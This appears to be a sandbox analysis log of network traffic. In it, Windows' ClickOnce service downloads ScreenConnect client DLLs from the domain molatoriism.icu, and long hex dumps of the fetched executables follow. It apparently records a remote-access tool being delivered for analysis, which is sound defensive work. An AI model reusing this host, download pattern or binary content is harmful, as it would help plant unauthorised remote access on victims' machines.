                                                                                                                                                                              Data Ascii: TVE_TOGGLETVIF_STATEMAX_TEXT_SIZERectangleFMSGWHGWLTVM_GETNEXTITEMTVITEMFORCEFILESYSTEMMIIMBOTTOMWMSIGDNFORCESHOWHIDDEN<>OMENUITEMINFO<dialog>PFDAPTOPSWPHIDEPINNEDPLACESHIDEMRUPLACESMFSTVISFILEOPENDIALOGOPTIONSALLOWMULTISELECTRE
                                                                                                                                                                              2024-11-07 17:04:35 UTC1369INData Raw: 74 65 00 73 74 61 74 65 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 49 46 69 6c 65 44 69 61 6c 6f 67 45 76 65 6e 74 73 2e 4f 6e 4f 76 65 72 77 72 69 74 65 00 53 54 41 54 68 72 65 61 64 41 74 74 72 69 62 75 74 65 00 45 6d 62 65 64 64 65 64 41 74 74 72 69 62 75 74 65 00 43 6f 6d 70 69 6c 65 72 47 65 6e 65 72 61 74 65 64 41 74 74 72 69 62 75 74 65 00 47 75 69 64 41 74 74 72 69 62 75 74 65 00 43 6c 61 73 73 49 6e 74 65 72 66 61 63 65 41 74 74 72 69 62 75 74 65 00 55 6e 76 65 72 69 66 69 61 62 6c 65 43 6f 64 65 41 74 74 72 69 62 75 74 65 00 41 74 74 72 69 62 75 74 65 55 73 61 67 65 41 74 74 72 69 62 75 74 65 00 44 65 62 75 67 67 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 4e 75 6c 6c 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 43 6f 6d 56 69 73 69 62 6c 65 41 74
                                                                                                                                                                              Data Ascii: testateScreenConnect.IFileDialogEvents.OnOverwriteSTAThreadAttributeEmbeddedAttributeCompilerGeneratedAttributeGuidAttributeClassInterfaceAttributeUnverifiableCodeAttributeAttributeUsageAttributeDebuggableAttributeNullableAttributeComVisibleAt
                                                                                                                                                                              2024-11-07 17:04:35 UTC1369INData Raw: 74 49 74 65 6d 00 68 69 74 65 6d 00 53 79 73 74 65 6d 00 67 65 74 5f 42 6f 74 74 6f 6d 00 62 6f 74 74 6f 6d 00 45 6e 75 6d 00 50 65 6e 00 43 6c 69 65 6e 74 54 6f 53 63 72 65 65 6e 00 63 43 68 69 6c 64 72 65 6e 00 4d 61 69 6e 00 46 69 78 75 70 41 70 70 44 6f 6d 61 69 6e 00 45 78 74 72 61 63 74 41 73 73 6f 63 69 61 74 65 64 49 63 6f 6e 00 56 65 72 73 69 6f 6e 00 41 70 70 6c 69 63 61 74 69 6f 6e 00 67 65 74 5f 4c 6f 63 61 74 69 6f 6e 00 47 65 74 4d 65 73 73 61 67 65 4d 6f 75 73 65 53 63 72 65 65 6e 4c 6f 63 61 74 69 6f 6e 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 49 46 69 6c 65 44 69 61 6c 6f 67 45 76 65 6e 74 73 2e 4f 6e 53 68 61 72 65 56 69 6f 6c 61 74 69 6f 6e 00 53 79 73 74 65 6d 49 6e 66 6f 72 6d 61 74 69 6f 6e 00 69 74 65 6d 41 63 74 69 6f 6e 00 53
                                                                                                                                                                              Data Ascii: tItemhitemSystemget_BottombottomEnumPenClientToScreencChildrenMainFixupAppDomainExtractAssociatedIconVersionApplicationget_LocationGetMessageMouseScreenLocationScreenConnect.IFileDialogEvents.OnShareViolationSystemInformationitemActionS


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              8192.168.2.549747172.67.182.2144437120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-07 17:04:36 UTC92OUTGET /Bin/ScreenConnect.Client.dll HTTP/1.1
                                                                                                                                                                              Host: molatoriism.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              2024-11-07 17:04:37 UTC775INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 07 Nov 2024 17:04:37 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AFi3i%2BZTB1%2Bjm4xhyJCl2YglEAbSUaJXVOE3I%2F%2Ffni4s3F5%2FT09IXb7y7uQQF6flOInPxAYhfppsFDmw7uGD6xu8sUdKSOItkHt2mes6fUtOKUwZJWA2XSnsHtKWbZ9MIGo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8deee746edcee73a-DFW
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1537&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=707&delivery_rate=1807740&cwnd=243&unsent_bytes=0&cid=5745e6f97c2cda2d&ts=622&x=0"
                                                                                                                                                                              2024-11-07 17:04:37 UTC594INData Raw: 34 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5a 3c cd b8 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 fa 02 00 00 06 00 00 00 00 00 00 82 18 03 00 00 20 00 00 00 20 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 9e 14 03 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00
                                                                                                                                                                              Data Ascii: 4000MZ@!L!This program cannot be run in DOS mode.$PELZ<" 0 `@
                                                                                                                                                                              2024-11-07 17:04:37 UTC1369INData Raw: 00 00 00 00 1e 02 28 1c 00 00 0a 2a 1e 02 28 1c 00 00 0a 2a 5e 02 28 1c 00 00 0a 02 17 8d 9c 00 00 01 25 16 03 9c 7d 01 00 00 04 2a 3a 02 28 1c 00 00 0a 02 03 7d 01 00 00 04 2a 3a 02 28 1c 00 00 0a 02 03 7d 02 00 00 04 2a 3a 02 28 1c 00 00 0a 02 03 7d 03 00 00 04 2a 1e 02 7b 04 00 00 04 2a 3a 02 28 1d 00 00 0a 02 03 7d 04 00 00 04 2a 13 30 06 00 41 00 00 00 00 00 00 00 02 28 07 00 00 06 73 1e 00 00 0a 25 03 7e 28 01 00 04 25 2d 17 26 7e 27 01 00 04 fe 06 79 04 00 06 73 1f 00 00 0a 25 80 28 01 00 04 28 01 00 00 2b 28 02 00 00 2b 6f 22 00 00 0a 6f b6 03 00 06 2a 00 00 00 13 30 0b 00 73 00 00 00 00 00 00 00 7e 23 00 00 0a 1f 11 32 07 20 c8 00 00 00 2b 02 1f 14 6a 80 16 00 00 04 20 e8 03 00 00 80 1d 00 00 04 20 d0 07 00 00 80 1e 00 00 04 18 8d a1 00 00 01 25
                                                                                                                                                                              Data Ascii: (*(*^(%}*:(}*:(}*:(}*{*:(}*0A(s%~(%-&~'ys%((+(+o"o*0s~#2 +j %
                                                                                                                                                                              2024-11-07 17:04:37 UTC1369INData Raw: 03 7d 55 00 00 04 2a 1e 02 7b 56 00 00 04 2a 22 02 03 7d 56 00 00 04 2a 1e 02 28 4a 00 00 0a 2a 1e 02 7b 57 00 00 04 2a 22 02 03 7d 57 00 00 04 2a 1e 02 7b 58 00 00 04 2a 22 02 03 7d 58 00 00 04 2a 1e 02 7b 59 00 00 04 2a 22 02 03 7d 59 00 00 04 2a 1e 02 28 49 00 00 0a 2a 1e 02 28 49 00 00 0a 2a 1e 02 28 49 00 00 0a 2a 1e 02 7b 5a 00 00 04 2a 22 02 03 7d 5a 00 00 04 2a 1e 02 7b 5b 00 00 04 2a 22 02 03 7d 5b 00 00 04 2a 1e 02 7b 5c 00 00 04 2a 22 02 03 7d 5c 00 00 04 2a 1e 02 28 4d 00 00 06 2a 1e 02 7b 5d 00 00 04 2a 22 02 03 7d 5d 00 00 04 2a 1e 02 28 4d 00 00 06 2a 1e 02 7b 5e 00 00 04 2a 22 02 03 7d 5e 00 00 04 2a 1e 02 7b 5f 00 00 04 2a 22 02 03 7d 5f 00 00 04 2a 1e 02 28 4d 00 00 06 2a 1e 02 7b 60 00 00 04 2a 22 02 03 7d 60 00 00 04 2a 1e 02 7b 61 00
                                                                                                                                                                              Data Ascii: }U*{V*"}V*(J*{W*"}W*{X*"}X*{Y*"}Y*(I*(I*(I*{Z*"}Z*{[*"}[*{\*"}\*(M*{]*"}]*(M*{^*"}^*{_*"}_*(M*{`*"}`*{a
                                                                                                                                                                              2024-11-07 17:04:37 UTC1369INData Raw: 28 0f 00 00 2b 25 8c 74 00 00 1b 07 8c 71 00 00 1b 6f 70 00 00 0a 6f 71 00 00 0a 8c 74 00 00 1b 28 72 00 00 0a 02 07 6f 73 00 00 0a 02 28 0f 00 00 2b 25 8c 74 00 00 1b 07 8c 71 00 00 1b 6f 70 00 00 0a 6f 71 00 00 0a 8c 74 00 00 1b 28 72 00 00 0a de 0a 08 2c 06 08 6f 14 00 00 0a dc 06 7b 68 00 00 0a 8c 75 00 00 1b 6f 74 00 00 0a 39 5f ff ff ff 2a 00 00 01 10 00 00 02 00 51 00 55 a6 00 0a 00 00 00 00 1e 02 28 1c 00 00 0a 2a 22 02 03 7d 96 00 00 04 2a 1e 02 7b 96 00 00 04 2a 22 02 03 7d 96 00 00 04 2a 00 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 2f 01 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 c5 00 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 13 30 02 00 29 00 00 00 0d
                                                                                                                                                                              Data Ascii: (+%tqopoqt(ros(+%tqopoqt(r,o{huot9_*QU(*"}*{*"}*0@sur/pov&rYpov&(, ow&}ow&o)*0)
                                                                                                                                                                              2024-11-07 17:04:37 UTC1369INData Raw: 0a 02 7b 99 00 00 04 6f 80 00 00 0a 20 29 55 55 a5 5a 28 81 00 00 0a 02 7b 9a 00 00 04 6f 82 00 00 0a 58 2a 5e 03 75 40 00 00 02 2c 0d 02 03 a5 40 00 00 02 28 fb 00 00 06 2a 16 2a c6 28 7f 00 00 0a 02 7b 99 00 00 04 03 7b 99 00 00 04 6f 83 00 00 0a 2c 17 28 81 00 00 0a 02 7b 9a 00 00 04 03 7b 9a 00 00 04 6f 84 00 00 0a 2a 16 2a 56 03 02 28 f1 00 00 06 54 04 02 28 f3 00 00 06 81 1b 00 00 01 2a 22 02 03 7d 9b 00 00 04 2a 1e 02 7b 9b 00 00 04 2a 22 02 03 7d 9b 00 00 04 2a 00 00 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 bd 02 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 01 01 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 6e 03 72 fb 02 00 70 6f 76 00 00 0a 26 03 02 28 fe 00
                                                                                                                                                                              Data Ascii: {o )UUZ({oX*^u@,@(**({{o,({{o**V(T(*"}*{*"}*0@surpov&rYpov&(, ow&}ow&o)*nrpov&(
                                                                                                                                                                              2024-11-07 17:04:37 UTC1369INData Raw: 00 00 0a 58 2a 5e 03 75 46 00 00 02 2c 0d 02 03 a5 46 00 00 02 28 32 01 00 06 2a 16 2a 00 00 00 13 30 03 00 49 00 00 00 00 00 00 00 28 8b 00 00 0a 02 7b a1 00 00 04 03 7b a1 00 00 04 6f 91 00 00 0a 2c 2f 28 8d 00 00 0a 02 7b a2 00 00 04 03 7b a2 00 00 04 6f 92 00 00 0a 2c 17 28 8f 00 00 0a 02 7b a3 00 00 04 03 7b a3 00 00 04 6f 93 00 00 0a 2a 16 2a 66 03 02 28 26 01 00 06 52 04 02 28 28 01 00 06 df 05 02 28 2a 01 00 06 54 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 8b 04 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 35 01 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 37 01 00 06 16 fe 01 2a 26 0f 00 03 28 3a 01 00 06 2a 0a 16 2a 5e 03 75 47 00 00 02
                                                                                                                                                                              Data Ascii: X*^uF,F(2**0I({{o,/({{o,({{o**f(&R(((*T*0@surpov&rYpov&(5, ow&}ow&o)**.(7*&(:**^uG
                                                                                                                                                                              2024-11-07 17:04:37 UTC1369INData Raw: 00 00 0a 2a 5e 03 75 4c 00 00 02 2c 0d 02 03 a5 4c 00 00 02 28 6c 01 00 06 2a 16 2a 5e 28 8b 00 00 0a 02 7b a7 00 00 04 03 7b a7 00 00 04 6f 91 00 00 0a 2a 26 03 02 28 64 01 00 06 52 2a 22 02 03 7d a8 00 00 04 2a 1e 02 7b a8 00 00 04 2a 22 02 03 7d a8 00 00 04 2a 00 00 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 cd 05 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 72 01 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 13 30 02 00 29 00 00 00 12 00 00 11 03 72 25 05 00 70 6f 76 00 00 0a 26 03 02 28 6f 01 00 06 0a 12 00 fe 16 b1 00 00 01 6f 29 00 00 0a 6f 76 00 00 0a 26 17 2a 2e 02 03 28 74 01 00 06 16 fe 01 2a 26 0f 00 03 28 77 01 00 06 2a 46 28 8b 00 00 0a 02 7b a8 00 00 04 6f
                                                                                                                                                                              Data Ascii: *^uL,L(l**^({{o*&(dR*"}*{*"}*0@surpov&rYpov&(r, ow&}ow&o)*0)r%pov&(oo)ov&*.(t*&(w*F({o
                                                                                                                                                                              2024-11-07 17:04:37 UTC1369INData Raw: 00 70 6f 76 00 00 0a 26 02 06 28 ac 01 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 ae 01 00 06 16 fe 01 2a 26 0f 00 03 28 b1 01 00 06 2a 0a 16 2a 5e 03 75 54 00 00 02 2c 0d 02 03 a5 54 00 00 02 28 b1 01 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 53 07 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 b3 01 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 b5 01 00 06 16 fe 01 2a 26 0f 00 03 28 b8 01 00 06 2a 0a 16 2a 5e 03 75 55 00 00 02 2c 0d 02 03 a5 55 00 00 02 28 b8 01 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 75 07 00 70 6f
                                                                                                                                                                              Data Ascii: pov&(, ow&}ow&o)**.(*&(**^uT,T(***0@surSpov&rYpov&(, ow&}ow&o)**.(*&(**^uU,U(***0@surupo
                                                                                                                                                                              2024-11-07 17:04:37 UTC1369INData Raw: 2a 0a 17 2a 22 02 03 7d af 00 00 04 2a 1e 02 7b af 00 00 04 2a 22 02 03 7d af 00 00 04 2a 00 00 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 c5 08 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 ee 01 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 13 30 02 00 29 00 00 00 15 00 00 11 03 72 f9 08 00 70 6f 76 00 00 0a 26 03 02 28 eb 01 00 06 0a 12 00 fe 16 1a 00 00 01 6f 29 00 00 0a 6f 76 00 00 0a 26 17 2a 2e 02 03 28 f0 01 00 06 16 fe 01 2a 26 0f 00 03 28 f3 01 00 06 2a 46 28 97 00 00 0a 02 7b af 00 00 04 6f 98 00 00 0a 2a 5e 03 75 5b 00 00 02 2c 0d 02 03 a5 5b 00 00 02 28 f3 01 00 06 2a 16 2a 5e 28 97 00 00 0a 02 7b af 00 00 04 03 7b af 00 00 04 6f 99 00 00 0a 2a 36 03 02 28 eb
                                                                                                                                                                              Data Ascii: **"}*{*"}*0@surpov&rYpov&(, ow&}ow&o)*0)rpov&(o)ov&*.(*&(*F({o*^u[,[(**^({{o*6(
                                                                                                                                                                              2024-11-07 17:04:37 UTC1369INData Raw: 77 00 00 0a 26 06 6f 29 00 00 0a 2a 13 30 02 00 29 00 00 00 12 00 00 11 03 72 25 05 00 70 6f 76 00 00 0a 26 03 02 28 28 02 00 06 0a 12 00 fe 16 b1 00 00 01 6f 29 00 00 0a 6f 76 00 00 0a 26 17 2a 2e 02 03 28 2d 02 00 06 16 fe 01 2a 26 0f 00 03 28 30 02 00 06 2a 46 28 8b 00 00 0a 02 7b b2 00 00 04 6f 8c 00 00 0a 2a 5e 03 75 62 00 00 02 2c 0d 02 03 a5 62 00 00 02 28 30 02 00 06 2a 16 2a 5e 28 8b 00 00 0a 02 7b b2 00 00 04 03 7b b2 00 00 04 6f 91 00 00 0a 2a 26 03 02 28 28 02 00 06 52 2a 22 02 03 7d b3 00 00 04 2a 1e 02 7b b3 00 00 04 2a 22 02 03 7d b3 00 00 04 2a 00 00 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 69 0a 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 36 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d
                                                                                                                                                                              Data Ascii: w&o)*0)r%pov&((o)ov&*.(-*&(0*F({o*^ub,b(0**^({{o*&((R*"}*{*"}*0@suripov&rYpov&(6, ow&}


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              9192.168.2.549757172.67.182.2144437120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-07 17:04:39 UTC99OUTGET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
                                                                                                                                                                              Host: molatoriism.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              2024-11-07 17:04:40 UTC773INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 07 Nov 2024 17:04:40 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B4b7XmZcC9%2BzfSzVziSH%2FtJjo827fJ36kR3pSjtdjHX%2FnHQMfRJyuVCnraPttkF2PBOwqZm3tb1APRBAeWFBmlMA4Ecx3Y99XZ1W9kv9t2FjCnhPTFBRyWudDx9ZstSiVLU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8deee7572cec6b52-DFW
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1075&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=714&delivery_rate=2576512&cwnd=223&unsent_bytes=0&cid=a7a8eaf9c1acde54&ts=642&x=0"
                                                                                                                                                                              2024-11-07 17:04:40 UTC596INData Raw: 34 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 30 d8 54 90 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 02 01 00 00 06 00 00 00 00 00 00 ba 20 01 00 00 20 00 00 00 40 01 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 64 fa 01 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00
                                                                                                                                                                              Data Ascii: 4000MZ@!L!This program cannot be run in DOS mode.$PEL0T" 0 @ d@
                                                                                                                                                                              2024-11-07 17:04:40 UTC1369INData Raw: 00 00 1e 02 28 18 00 00 0a 2a 5e 02 28 18 00 00 0a 02 17 8d 82 00 00 01 25 16 03 9c 7d 01 00 00 04 2a 3a 02 28 18 00 00 0a 02 03 7d 01 00 00 04 2a 3a 02 28 18 00 00 0a 02 03 7d 02 00 00 04 2a 3a 02 28 18 00 00 0a 02 03 7d 03 00 00 04 2a 96 7e 2c 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 69 00 00 06 73 19 00 00 0a 25 80 2c 00 00 04 28 01 00 00 2b 2a 76 73 8d 00 00 06 25 02 7d 50 00 00 04 fe 06 8e 00 00 06 73 1b 00 00 0a 28 1c 00 00 0a 2a 00 00 00 13 30 06 00 0d 01 00 00 01 00 00 11 02 73 1d 00 00 0a 7d 05 00 00 04 02 73 1d 00 00 0a 7d 06 00 00 04 02 16 8d 18 00 00 01 7d 0e 00 00 04 02 03 04 28 26 00 00 06 02 05 7d 04 00 00 04 02 28 14 00 00 06 26 02 28 29 00 00 06 02 fe 06 1b 00 00 06 73 1e 00 00 0a 6f 1f 00 00 0a 02 28 29 00 00 06 7e 2d 00 00 04 25 2d 17
                                                                                                                                                                              Data Ascii: (*^(%}*:(}*:(}*:(}*~,%-&~+is%,(+*vs%}Ps(*0s}s}}(&}(&()so()~-%-
                                                                                                                                                                              2024-11-07 17:04:40 UTC1369INData Raw: 07 7b 52 00 00 04 6f 45 00 00 0a 20 0b 06 00 00 33 2b 11 0a 13 0e 11 0b 13 0f 12 0e 28 48 00 00 0a 12 0f 28 48 00 00 0a fe 01 12 0e 28 49 00 00 0a 12 0f 28 49 00 00 0a fe 01 5f 2d 64 12 0a 28 49 00 00 0a 2d 03 17 2b 2a 12 0a 28 48 00 00 0a 7e 25 00 00 04 25 2d 13 26 14 fe 06 4a 00 00 0a 73 4b 00 00 0a 25 80 25 00 00 04 28 04 00 00 2b 16 fe 01 2c 2c 7e 28 00 00 0a 02 28 28 00 00 06 6f 4d 00 00 0a 6f 4e 00 00 0a 2c 15 02 17 28 17 00 00 06 02 73 4f 00 00 0a 17 11 0a 28 0e 00 00 06 02 7b 08 00 00 04 d0 1f 00 00 01 28 50 00 00 0a 11 07 7b 52 00 00 04 6f 51 00 00 0a 11 09 2d 03 17 2b 11 11 09 28 45 00 00 0a 20 0b 06 00 00 fe 01 16 fe 01 2d 2b 11 0a 13 0f 11 0b 13 0e 12 0f 28 48 00 00 0a 12 0e 28 48 00 00 0a fe 01 12 0f 28 49 00 00 0a 12 0e 28 49 00 00 0a fe 01
                                                                                                                                                                              Data Ascii: {RoE 3+(H(H(I(I_-d(I-+*(H~%%-&JsK%%(+,,~(((oMoN,(sO({(P{RoQ-+(E -+(H(H(I(I
                                                                                                                                                                              2024-11-07 17:04:40 UTC1369INData Raw: 6e 00 00 0a 26 2b 18 11 16 6f 6c 00 00 0a 17 33 0e 7e 6d 00 00 0a 11 17 16 28 6f 00 00 0a 26 16 0b 38 24 03 00 00 03 75 26 00 00 01 13 18 11 18 39 c9 00 00 00 11 18 6f 70 00 00 0a 2d 07 18 0b 38 05 03 00 00 11 18 6f 70 00 00 0a 17 40 f8 02 00 00 02 7b 05 00 00 04 13 08 11 08 28 2d 00 00 0a 02 7b 08 00 00 04 7e 34 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 71 00 00 06 73 71 00 00 0a 25 80 34 00 00 04 28 0b 00 00 2b 13 19 17 0b 73 72 00 00 0a 25 7e 28 00 00 0a 6f 73 00 00 0a 11 19 28 74 00 00 0a 28 75 00 00 0a 6f 76 00 00 0a 25 7e 28 00 00 0a 6f 77 00 00 0a 11 19 28 74 00 00 0a 28 75 00 00 0a 6f 78 00 00 0a 25 7e 28 00 00 0a 6f 79 00 00 0a 11 19 28 74 00 00 0a 28 75 00 00 0a 6f 7a 00 00 0a 0a dd 5c 02 00 00 26 16 0b dd 54 02 00 00 11 08 28 33 00 00 0a dc 73
                                                                                                                                                                              Data Ascii: n&+ol3~m(o&8$u&9op-8op@{(-{~4%-&~+qsq%4(+sr%~(os(t(uov%~(ow(t(uox%~(oy(t(uoz\&T(3s
                                                                                                                                                                              2024-11-07 17:04:40 UTC1369INData Raw: 00 04 07 6f 9c 00 00 0a 16 6f 62 00 00 06 02 7b 07 00 00 04 07 6f 9e 00 00 0a de 00 07 17 59 0b 07 16 3c 64 ff ff ff de 07 06 28 33 00 00 0a dc 2a 00 00 01 1c 00 00 00 00 7c 00 14 90 00 21 12 00 00 01 02 00 0d 00 b1 be 00 07 00 00 00 00 13 30 07 00 9d 01 00 00 07 00 00 11 04 75 2c 00 00 01 0a 06 39 e5 00 00 00 02 7b 0d 00 00 04 03 73 9f 00 00 0a 25 06 6f a0 00 00 0a 7e 3c 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 79 00 00 06 73 a1 00 00 0a 25 80 3c 00 00 04 28 10 00 00 2b 7e 3d 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 7a 00 00 06 73 a3 00 00 0a 25 80 3d 00 00 04 28 11 00 00 2b 16 28 12 00 00 2b 6f a5 00 00 0a 25 06 6f a6 00 00 0a 7e 3e 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 7b 00 00 06 73 a1 00 00 0a 25 80 3e 00 00 04 28 10 00 00 2b 16 28 12 00 00 2b
                                                                                                                                                                              Data Ascii: oob{oY<d(3*|!0u,9{s%o~<%-&~+ys%<(+~=%-&~+zs%=(+(+o%o~>%-&~+{s%>(+(+
                                                                                                                                                                              2024-11-07 17:04:40 UTC1369INData Raw: 2d 17 26 7e 2b 00 00 04 fe 06 84 00 00 06 73 ce 00 00 0a 25 80 47 00 00 04 28 1d 00 00 2b 28 1e 00 00 2b 7d 71 00 00 04 06 7e 28 00 00 0a 6f d0 00 00 0a 2c 07 28 d1 00 00 0a 2d 72 02 7b 04 00 00 04 15 2e 14 07 06 fe 06 b8 00 00 06 73 d2 00 00 0a 28 1f 00 00 2b 2d 48 28 d4 00 00 0a 0d 12 03 28 49 00 00 0a 2c 21 06 12 03 28 48 00 00 0a 7d 70 00 00 04 07 06 fe 06 b9 00 00 06 73 d2 00 00 0a 28 1f 00 00 2b 2d 0b 12 03 fe 15 11 00 00 1b 09 2b 20 06 7b 70 00 00 04 73 d5 00 00 0a 2b 13 02 7b 04 00 00 04 73 d5 00 00 0a 2b 06 16 73 d5 00 00 0a 7d 72 00 00 04 07 06 fe 06 ba 00 00 06 73 d6 00 00 0a 28 20 00 00 2b 06 fe 06 bb 00 00 06 73 d7 00 00 0a 28 d1 00 00 0a 28 21 00 00 2b 7e 48 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 85 00 00 06 73 d9 00 00 0a 25 80 48 00 00
                                                                                                                                                                              Data Ascii: -&~+s%G(+(+}q~(o,(-r{.s(+-H((I,!(H}ps(+-+ {ps+{s+s}rs( +s((!+~H%-&~+s%H
